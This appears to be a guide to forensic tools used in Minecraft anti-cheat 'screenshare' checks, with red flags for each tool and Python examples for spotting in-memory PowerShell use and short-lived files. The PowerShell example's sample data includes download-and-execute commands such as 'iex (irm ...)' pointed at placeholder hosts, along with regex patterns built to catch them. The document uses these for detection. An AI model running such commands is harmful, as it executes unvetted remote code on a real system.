Collects a full hardware snapshot of the target PC to verify the machine is real and not a VM or spoofed setup.
What to check
[ok]HyperVisorPresent must be False, confirms no VM is running
[ok]HyperVRequirementVirtualizationFirmwareEnabled must be False
[ok]OS install date, note if Windows was installed suspiciously recently
[ok]Network adapters, check CsNetworkAdapters for VPN or virtual adapters
[ok]Last boot time via OsLastBootUpTime, fresh reboots right before a check are suspicious
[ok]Motherboard and BIOS serials to verify machine consistency across checks
Red flags
[!]HyperVisorPresent: True, person is likely running a VM to hide cheats
[!]VPN or virtual adapter present, e.g. x-ovpn-tap in the adapter list
[!]Windows installed the same day as the screenshare
[!]Machine rebooted within minutes before the check started
memory scanner
Meow Doomsday Fucker
Scans the memory of running Java processes to detect the Doomsday cheat client.
What to check
[ok]Run the Memory Scanner tab while Minecraft is open, it will list all detected Java processes
[ok]Output should say "All processes clean." if nothing is found
[ok]Each process will show as "javaw [PID] -> clean" or "javaw [PID] -> DETECTED"
Red flags
[!]Any process showing DETECTED in the output means Doomsday was found in memory
[!]Output says "Doomsday Detected" in red next to the Stop button
[!]Output line reads "Doomsday sucks.", this is the tool confirming a positive detection
scheduled tasks
TasksParser
Parses all Windows scheduled tasks and flags suspicious ones based on signature status.
What to check
[ok]Signed column, most legitimate tasks will show Signed in green
[ok]On Logon column shows tasks that auto-run at login, pay extra attention to these
Red flags
[!]Any task showing Not signed in orange, especially ones set to run On Logon
[!]Tasks running from unusual paths like AppData, Temp, or a custom folder
[!]Registry Mismatch flagged, the task on disk does not match what is registered
mod scanner
RedLotus Mod Analyzer
Scans the player's Minecraft mods folder (via memory scan or disk scan) and checks each mod against Modrinth to verify it is a known, legitimate mod.
What to check
[ok]Use Memory Scan to automatically detect the running Minecraft process and its mod folder
[ok]Each mod should show Verified in green under the Modrinth column
[ok]Status column should say Found, the mod file exists where it should
[ok]Check the mod folder path shown under Generic Information, verify it matches what the player says they use
Red flags
[!]Any mod showing Unverified, not found on Modrinth, could be a private or cheat mod
[!]Mod status showing Not Found, the mod was in memory but not on disk, suspicious
[!]Mod path pointing to an unexpected location outside the normal profile folder
[!]Mod folder modified after Minecraft launch, shown in red next to the path
account scanner
RedLotus Alt Checker
Scans the system for logged-in Minecraft, Discord, Steam, and other accounts to identify alts or secondary accounts the player may not have disclosed.
What to check
[ok]Use Target Scan with the player's username to search across all platforms at once
[ok]Minecraft Scan will show all Java and Bedrock accounts cached on the machine
[ok]Review the Accounts Found tab, cross-reference every account shown with the player's known alts
[ok]Check the Forensics tab for deeper evidence of account activity
Red flags
[!]Accounts found that the player has not disclosed or claims not to own
[!]Multiple Minecraft accounts on the same machine, could indicate ban evasion alts
[!]Discord or Steam accounts with different usernames that do not match the player's known identity
execution history
BAM Parser
Reads the BAM registry to show every executable that has been run on the machine, with timestamps and signatures.
What to check
[ok]Review the Last Execution timestamps, focus on anything run around the time of the screenshare (SS) or shortly before it
[ok]Signature column, most legitimate programs will show Signed
[ok]Use the Not Signed Only and Flagged Only filters to narrow down suspicious entries quickly
Red flags
[!]Unsigned executables run from AppData, Temp, Desktop, or non-standard paths
[!]Entries marked Deleted in the Signature column, the file was run then removed
[!]Known cheat-related filenames in the path (e.g. injector, loader, client names)
execution history
BAM Reveal
Similar to BAM Parser but with additional detection capabilities, shows generics tags, fake signatures, and cheat labels alongside execution history.
What to check
[ok]Signature column, look for Signed, Unsigned, Fake Signature, or Cheat labels
[ok]Use Post-Logon, Show Untrusted, and Show Not Found filters to shorten results
[ok]Check Registry BAM and Deleted BAM tabs for historical and removed entries
Red flags
[!]Any entry labelled Cheat in the Signature column, direct detection
[!]Entries with Fake Signature, the executable was signed with an invalid or spoofed cert
[!]Unsigned executables run from Downloads, Desktop, or temp locations shortly before the SS
multi-purpose
Espouken
A tool with scan modes including time change detection, unicode string scanning, MC alt checking, HWID display, and service start time analysis.
What to check
[ok]Show services start times, compare service start times against the system boot time to detect anything that started unexpectedly late
[ok]Scan for time changes, detects if the system clock was manipulated
[ok]Scan for unicode strings, can surface obfuscated or hidden text in memory
[ok]Show HWID, use to verify hardware ID consistency across multiple checks
Red flags
[!]Services that started significantly later than boot time with no clear reason
[!]DPS (Diagnostic Policy Service) stopped or disabled, this service logs diagnostic activity and is commonly disabled by cheaters
[!]Evidence of clock manipulation from the time change scan
memory / powershell
Fileless
Scans for fileless execution techniques, PowerShell commands that were run entirely in memory and never saved to disk, which cheats sometimes use to avoid leaving traces.
What to check
[ok]The tool outputs any suspicious PowerShell commands it finds in memory after the logon time
[ok]Review each flagged command, check what URL or script it was trying to run
[ok]Logon time is shown at the top, only events after this are relevant
Red flags
[!]PowerShell commands using -ExecutionPolicy Bypass and iex (irm 'url') to download and run scripts from the internet
[!]Commands referencing known cheat or screenshare-bypass GitHub repos
[!]Multiple suspicious commands found, indicates the player ran several in-memory scripts
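The review step above as an added example (not part of the Fileless tool or of the original page): it takes command lines with timestamps, drops everything before the logon time, flags execution-policy bypass and download-and-execute patterns, and pulls out the URL for the reviewer. The sample commands, the .example URLs and all function names are constructed for illustration.

```python
import re
from datetime import datetime

# Constructed sample: (timestamp, PowerShell command line) pairs as a reviewer
# might copy them out of a scanner's output. URLs use the reserved .example TLD.
LOGON = datetime(2024, 5, 1, 18, 0, 0)
SAMPLE = [
    (datetime(2024, 5, 1, 9, 12, 0),
     "powershell -ExecutionPolicy Bypass -c \"iex (irm 'https://old.example/a.ps1')\""),
    (datetime(2024, 5, 1, 18, 4, 10),
     "powershell.exe -NoProfile -ep bypass -Command \"iex (irm 'https://cdn.example/run.ps1')\""),
    (datetime(2024, 5, 1, 18, 6, 30),
     "powershell -Command \"Get-ChildItem $env:APPDATA\\.minecraft\\mods\""),
    (datetime(2024, 5, 1, 18, 9, 2),
     "pwsh -c \"Invoke-RestMethod https://cdn.example/b.ps1 | Invoke-Expression\""),
]

# -ExecutionPolicy can be abbreviated (-ep, -ex, -exec ...), so match the prefix.
BYPASS = re.compile(r"(?<![\w-])-(?:ep|ex[a-z]*)\s+bypass\b", re.I)
DOWNLOAD = re.compile(r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b", re.I)
EXEC = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\"|)]+", re.I)

def review(events, logon):
    """Return flagged commands that ran at or after the logon time."""
    findings = []
    for ts, cmd in events:
        if ts < logon:
            continue  # only events after logon are relevant
        reasons = []
        if BYPASS.search(cmd):
            reasons.append("execution-policy-bypass")
        if DOWNLOAD.search(cmd) and EXEC.search(cmd):
            reasons.append("download-and-execute")
        if reasons:
            findings.append({"time": ts, "reasons": reasons,
                             "urls": URL.findall(cmd), "command": cmd})
    return findings

if __name__ == "__main__":
    for f in review(SAMPLE, LOGON):
        print(f["time"], f["reasons"], f["urls"])
```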
injection detector
InjGen
Scans the running Minecraft process for injected DLLs, suspicious native modules, and known cheat client strings loaded into memory.
What to check
[ok]Tool automatically finds the javaw.exe PID and scans it
[ok]Suspicious Modules section lists any DLLs loaded into the process that are not standard
[ok]Client strings section shows any known cheat client identifiers found in memory
Red flags
[!]Output says Injection detected in untested game client, a DLL was injected into the process
[!]Known cheat client strings found, e.g. Doomsday-specific identifiers in the client strings section
[!]Unexpected DLLs with JNI flags loaded from non-standard paths inside the Minecraft process
file search
Everything
File system search that indexes every file and folder, letting you find any file by name or path faster than Windows Search.
What to check
[ok]Search for common cheat-related extensions: .dll, .jar, .bat
[ok]Use date filters to shorten results to files created or modified around the SS time
[ok]Search known cheat client names, injector keywords, or loader filenames directly
[ok]Check recently created folders in unusual locations like C:\Users\Public or root of C:
Red flags
[!]Cheat-related filenames anywhere on the system, even if the file no longer exists on disk
[!]DLL files sitting in AppData\Roaming, AppData\Local\Temp, or the Minecraft directory with no recognisable name
[!]Recently created .bat files often used as cleanup or launch scripts by cheat loaders
file activity
JournalTrace
Reads the Windows change journal (the NTFS USN journal, $UsnJrnl), a log the OS keeps of every file create, modify, rename, and delete event on a volume. Shows what happened on disk even if the files are gone.
What to check
[ok]Filter events to around the time of the SS, look for create and delete pairs that happened close together
[ok]Look for file rename events, a common cleanup technique to hide what was previously run
[ok]Cross-reference deleted filenames with known cheat file names or paths flagged by other tools
[ok]Check for bulk deletions in AppData or Temp shortly before the session started
Red flags
[!]A file was created and deleted within minutes
[!]Rename chains where a file had multiple name changes in a short period, suggests active obfuscation
[!]Mass deletion events in AppData or Temp immediately before Minecraft launched
[!]Known cheat filenames appearing in the journal even if the file is no longer present on disk
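How the create/delete pairs and rename chains above can be picked out of journal records, as an added example (not JournalTrace's code and not from the original page). It groups records by file reference number, which stays the same when a file is renamed. The records are constructed, and the 10-minute and two-rename thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def t(hms):  # helper for the constructed sample: same-day timestamps
    return datetime.fromisoformat("2024-05-01T" + hms)

# Constructed sample records: (time, file reference number, name, USN reason).
# The reference number stays the same across renames, so it is the grouping key.
RECORDS = [
    (t("17:40:00"), 101, "notes.txt", "FILE_CREATE"),
    (t("17:51:10"), 202, "setup.exe", "FILE_CREATE"),
    (t("17:52:05"), 202, "setup.exe", "RENAME_OLD_NAME"),
    (t("17:52:05"), 202, "a1.tmp", "RENAME_NEW_NAME"),
    (t("17:53:30"), 202, "a1.tmp", "RENAME_OLD_NAME"),
    (t("17:53:30"), 202, "log.dat", "RENAME_NEW_NAME"),
    (t("17:55:40"), 202, "log.dat", "FILE_DELETE"),
    (t("17:58:00"), 303, "cache.bin", "FILE_CREATE"),
    (t("19:30:00"), 303, "cache.bin", "FILE_DELETE"),
]

def analyse(records, max_lifetime=timedelta(minutes=10), min_renames=2):
    """Flag files created and deleted within max_lifetime, or renamed repeatedly."""
    by_file = defaultdict(list)
    for rec in sorted(records, key=lambda r: r[0]):
        by_file[rec[1]].append(rec)
    findings = []
    for frn, recs in by_file.items():
        created = next((r[0] for r in recs if r[3] == "FILE_CREATE"), None)
        deleted = next((r[0] for r in recs if r[3] == "FILE_DELETE"), None)
        lifetime = deleted - created if created and deleted else None
        names = []  # every name the file carried, in order
        for _, _, name, _ in recs:
            if not names or names[-1] != name:
                names.append(name)
        renames = sum(1 for r in recs if r[3] == "RENAME_NEW_NAME")
        short_lived = lifetime is not None and timedelta(0) <= lifetime <= max_lifetime
        rename_chain = renames >= min_renames
        if short_lived or rename_chain:
            findings.append({"frn": frn, "names": names, "lifetime": lifetime,
                             "short_lived": short_lived, "rename_chain": rename_chain})
    return findings

if __name__ == "__main__":
    for f in analyse(RECORDS):
        print(f)
```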
execution history
PrefetchParser
Parses Windows Prefetch files (C:\Windows\Prefetch\*.pf) to produce a timeline of every executable that ran on the machine, including first run, last run, and run count. Prefetch persists even after the file is deleted.
What to check
[ok]Check last run timestamps against the SS time, focus on anything executed within the same session window
[ok]Run count column, a count of 1 with a timestamp right before the SS suggests a tool that was run once and then removed
[ok]Cross-reference executable names against known cheat tool and injector filenames
[ok]Check referenced files inside each prefetch entry, can reveal what DLLs or configs the executable loaded
Red flags
[!]Prefetch entry for a known cheat tool or injector name, even if the file itself has since been deleted
[!]Single-run executables with generic or randomised names run immediately before Minecraft launched
[!]Referenced DLL paths inside a prefetch entry pointing to AppData, Temp, or non-standard locations
[!]Prefetch disabled entirely, hackers sometimes disable it to prevent this tool from being used
execution history
PrefetchView++
A GUI for Windows Prefetch data. Presents the same execution history as PrefetchParser in a sortable, filterable interface. It takes longer to load, which is why PrefetchParser is preferred.
What to check
[ok]Sort by Last Run time and work backwards from the SS timestamp to identify what ran in the lead-up
[ok]Use the Run Count column to spot single-execution programs
[ok]Click any entry to view the full list of files and DLLs it referenced during that run
Red flags
[!]Executable names with randomised strings, e.g. xG7f2k.exe, run once and never again
[!]Referenced file paths inside an entry that include known cheat directory names or temp paths
process analysis
System Informer
A process and system monitor which shows every running process with its loaded DLLs, network connections, memory maps, and signature status.
What to check
[ok]Find javaw.exe in the process list, expand it and open the Modules tab to see every DLL loaded into Minecraft
[ok]Check the Handles tab for open file handles pointing to unusual paths, can reveal what files a process is actively reading
[ok]Network tab shows all active connections per process, verify Minecraft is only connecting to expected Mojang or server IPs
[ok]Check the Memory tab for regions marked as executable but with no associated module, a sign of injected shellcode
[ok]Signature column in the process list flags unsigned or tampered executables at a glance
[ok]Use the Strings search on javaw.exe memory, filter by the player's active mods folder path to surface any mod paths still referenced in memory after being deleted or moved off disk
Red flags
[!]DLLs loaded into javaw.exe that are unsigned or originate from outside the JRE or Minecraft directories
[!]Executable memory regions inside the Minecraft process with no mapped module, indicates manual code injection
[!]Unexpected outbound connections from javaw.exe to IPs or domains unrelated to the game server or Mojang
[!]Any process running with a parent that makes no logical sense, e.g. a loader spawned by explorer.exe right before Minecraft started